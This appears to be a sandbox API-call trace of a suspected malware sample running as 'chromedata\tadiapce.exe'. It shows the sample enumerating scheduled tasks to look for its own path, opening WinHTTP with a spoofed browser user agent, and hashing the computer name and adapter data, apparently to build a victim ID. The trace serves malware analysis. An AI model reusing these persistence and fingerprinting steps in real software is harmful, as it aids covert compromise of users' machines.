	[0100.852] IUnknown:Release (This=0x63fe40) returned 0x0
	[0100.852] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.852] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.852] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe98) returned 0x0
	[0100.853] IRegisteredTaskCollection:get_Count (in: This=0x63fe98, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.853] IRegisteredTaskCollection:get_Item (in: This=0x63fe98, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff90) returned 0x0
	[0100.853] IRegisteredTask:get_Name (in: This=0x63ff90, pName=0x128e3c | out: pName=0x128e3c*="Calibration Loader") returned 0x0
	[0100.853] IRegisteredTask:get_Xml (in: This=0x63ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.856] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.883] IUnknown:Release (This=0x63ff90) returned 0x0
	[0100.883] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.883] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe98) returned 0x0
	[0100.885] ITaskFolderCollection:get_Count (in: This=0x63fe98, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.885] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.885] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.885] IUnknown:Release (This=0x63fd30) returned 0x0
	[0100.885] TaskScheduler:IUnknown:Release (This=0x63fcd0) returned 0x0
	[0100.885] ITaskFolderCollection:get_Item (in: This=0x632398, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x63fcd0) returned 0x0
	[0100.885] ITaskFolder:GetTasks (in: This=0x63fcd0, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x63fd40) returned 0x0
	[0100.887] IRegisteredTaskCollection:get_Count (in: This=0x63fd40, pCount=0x128f48 | out: pCount=0x128f48*=1) returned 0x0
	[0100.887] IRegisteredTaskCollection:get_Item (in: This=0x63fd40, index=0x128e4c*(varType=0x3, wReserved1=0x12, wReserved2=0xfcd0, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128f50 | out: ppRegisteredTask=0x128f50*=0x63fe28) returned 0x0
	[0100.887] IRegisteredTask:get_Name (in: This=0x63fe28, pName=0x128f54 | out: pName=0x128f54*="MP Scheduled Scan") returned 0x0
	[0100.887] IRegisteredTask:get_Xml (in: This=0x63fe28, pXml=0x128f5c | out: pXml=0x128f5c*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.889] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.919] IUnknown:Release (This=0x63fe28) returned 0x0
	[0100.919] IUnknown:Release (This=0x63fd40) returned 0x0
	[0100.919] ITaskFolder:GetFolders (in: This=0x63fcd0, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x63fd40) returned 0x0
	[0100.920] ITaskFolderCollection:get_Count (in: This=0x63fd40, pCount=0x128f44 | out: pCount=0x128f44*=0) returned 0x0
	[0100.920] IUnknown:Release (This=0x63fd40) returned 0x0
	[0100.920] TaskScheduler:IUnknown:Release (This=0x63fcd0) returned 0x0
	[0100.920] IUnknown:Release (This=0x632398) returned 0x0
	[0100.920] TaskScheduler:IUnknown:Release (This=0x632348) returned 0x0
	[0100.920] ITaskFolderCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x632348) returned 0x0
	[0100.920] ITaskFolder:GetTasks (in: This=0x632348, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x632378) returned 0x0
	[0100.922] IRegisteredTaskCollection:get_Count (in: This=0x632378, pCount=0x129060 | out: pCount=0x129060*=1) returned 0x0
	[0100.922] IRegisteredTaskCollection:get_Item (in: This=0x632378, index=0x128f64*(varType=0x3, wReserved1=0x12, wReserved2=0x2348, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x129068 | out: ppRegisteredTask=0x129068*=0x63fcd0) returned 0x0
	[0100.922] IRegisteredTask:get_Name (in: This=0x63fcd0, pName=0x12906c | out: pName=0x12906c*="SvcRestartTask") returned 0x0
	[0100.922] IRegisteredTask:get_Xml (in: This=0x63fcd0, pXml=0x129074 | out: pXml=0x129074*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.926] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.959] IUnknown:Release (This=0x63fcd0) returned 0x0
	[0100.959] IUnknown:Release (This=0x632378) returned 0x0
	[0100.959] ITaskFolder:GetFolders (in: This=0x632348, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x632378) returned 0x0
	[0100.961] ITaskFolderCollection:get_Count (in: This=0x632378, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0100.961] IUnknown:Release (This=0x632378) returned 0x0
	[0100.961] TaskScheduler:IUnknown:Release (This=0x632348) returned 0x0
	[0100.961] ITaskFolderCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x632348) returned 0x0
	[0100.961] ITaskFolder:GetTasks (in: This=0x632348, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x632390) returned 0x0
	[0100.962] IRegisteredTaskCollection:get_Count (in: This=0x632390, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0100.962] IUnknown:Release (This=0x632390) returned 0x0
	[0100.962] ITaskFolder:GetFolders (in: This=0x632348, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x632390) returned 0x0
	[0100.963] ITaskFolderCollection:get_Count (in: This=0x632390, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0100.963] IUnknown:Release (This=0x632390) returned 0x0
	[0100.963] TaskScheduler:IUnknown:Release (This=0x632348) returned 0x0
	[0100.963] IUnknown:Release (This=0x6322c8) returned 0x0
	[0100.963] TaskScheduler:IUnknown:Release (This=0x632298) returned 0x0
	[0100.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x20e990
	[0100.963] GetVersionExW (in: lpVersionInformation=0x1293e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77382fe7, dwMinorVersion=0x77f42b42, dwBuildNumber=0x0, dwPlatformId=0x1d01ac, szCSDVersion="") | out: lpVersionInformation=0x1293e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0100.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec308
	[0100.963] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x1f2598
	[0100.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23eba0
	[0100.986] GetFileAttributesW (lpFileName="Data\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data")) returned 0xffffffff
	[0100.986] CreateDirectoryW (lpPathName="Data\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data"), lpSecurityAttributes=0x0) returned 1
	[0100.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x1ecdd0
	[0100.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x219828
	[0100.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x1ecde8
	[0100.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x2199b0
	[0100.987] GetVersionExW (in: lpVersionInformation=0x1293bc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x755cb689, dwMinorVersion=0x24c, dwBuildNumber=0x77382fe7, dwPlatformId=0x77f42b7e, szCSDVersion="") | out: lpVersionInformation=0x1293bc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0100.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x410) returned 0x2424c8
	[0100.987] GetComputerNameW (in: lpBuffer=0x2424c8, nSize=0x1294e8 | out: lpBuffer="ZGW5TDPU", nSize=0x1294e8) returned 1
	[0100.987] Sleep (dwMilliseconds=0x1) 
	[0100.995] Sleep (dwMilliseconds=0x1) 
	[0101.011] Sleep (dwMilliseconds=0x1) 
	[0101.026] Sleep (dwMilliseconds=0x1) 
	[0101.042] Sleep (dwMilliseconds=0x1) 
	[0101.058] Sleep (dwMilliseconds=0x1) 
	[0101.074] Sleep (dwMilliseconds=0x1) 
	[0101.089] Sleep (dwMilliseconds=0x1) 
	[0101.104] Sleep (dwMilliseconds=0x1) 
	[0101.120] Sleep (dwMilliseconds=0x1) 
	[0101.135] Sleep (dwMilliseconds=0x1) 
	[0101.151] Sleep (dwMilliseconds=0x1) 
	[0101.169] Sleep (dwMilliseconds=0x1) 
	[0101.183] Sleep (dwMilliseconds=0x1) 
	[0101.198] Sleep (dwMilliseconds=0x1) 
	[0101.213] Sleep (dwMilliseconds=0x1) 
	[0101.229] Sleep (dwMilliseconds=0x1) 
	[0101.245] Sleep (dwMilliseconds=0x1) 
	[0101.260] Sleep (dwMilliseconds=0x1) 
	[0101.276] Sleep (dwMilliseconds=0x1) 
	[0101.292] Sleep (dwMilliseconds=0x1) 
	[0101.307] Sleep (dwMilliseconds=0x1) 
	[0101.323] Sleep (dwMilliseconds=0x1) 
	[0101.338] Sleep (dwMilliseconds=0x1) 
	[0101.354] Sleep (dwMilliseconds=0x1) 
	[0101.370] Sleep (dwMilliseconds=0x1) 
	[0101.385] Sleep (dwMilliseconds=0x1) 
	[0101.401] Sleep (dwMilliseconds=0x1) 
	[0101.416] Sleep (dwMilliseconds=0x1) 
	[0101.432] Sleep (dwMilliseconds=0x1) 
	[0101.447] Sleep (dwMilliseconds=0x1) 
	[0101.463] Sleep (dwMilliseconds=0x1) 
	[0101.479] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2424c8, Size=0x70) returned 0x2424c8
	[0101.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x290) returned 0x242540
	[0101.479] GetAdaptersInfo (in: AdapterInfo=0x242540, SizePointer=0x1294e8 | out: AdapterInfo=0x242540, SizePointer=0x1294e8) returned 0x0
	[0101.509] CryptAcquireContextW (in: phProv=0x1293ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1293ac*=0x1f2a10) returned 1
	[0101.510] CryptCreateHash (in: hProv=0x1f2a10, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1293b0 | out: phHash=0x1293b0) returned 1
	[0101.510] CryptHashData (hHash=0x213a70, pbData=0x242548, dwDataLen=0x194, dwFlags=0x0) returned 1
	[0101.510] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x1293a8, pdwDataLen=0x1293a4, dwFlags=0x0 | out: pbData=0x1293a8, pdwDataLen=0x1293a4) returned 1
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23ebc8
	[0101.511] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23ebc8, pdwDataLen=0x1293a8, dwFlags=0x0 | out: pbData=0x23ebc8, pdwDataLen=0x1293a8) returned 1
	[0101.511] CryptDestroyHash (hHash=0x213a70) returned 1
	[0101.511] CryptReleaseContext (hProv=0x1f2a10, dwFlags=0x0) returned 1
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x1f2a10
	[0101.511] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23ebc8) returned 1
	[0101.511] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x242540) returned 1
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec420
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4a0) returned 0x242540
	[0101.511] GetVersionExW (in: lpVersionInformation=0x1292e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1d0150, dwMinorVersion=0xa, dwBuildNumber=0x8, dwPlatformId=0x1d2a88, szCSDVersion="⨐\x1f⨋\x1f") | out: lpVersionInformation=0x1292e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0101.511] GetNativeSystemInfo (in: lpSystemInfo=0x1294c8 | out: lpSystemInfo=0x1294c8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x1f42c0
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248640
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23ebc8
	[0101.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x170) returned 0x248968
	[0101.511] NCryptOpenStorageProvider (in: phProvider=0x1294f0, pszProviderName="Microsoft Software Key Storage Provider", dwFlags=0x0 | out: phProvider=0x1294f0) returned 0x0
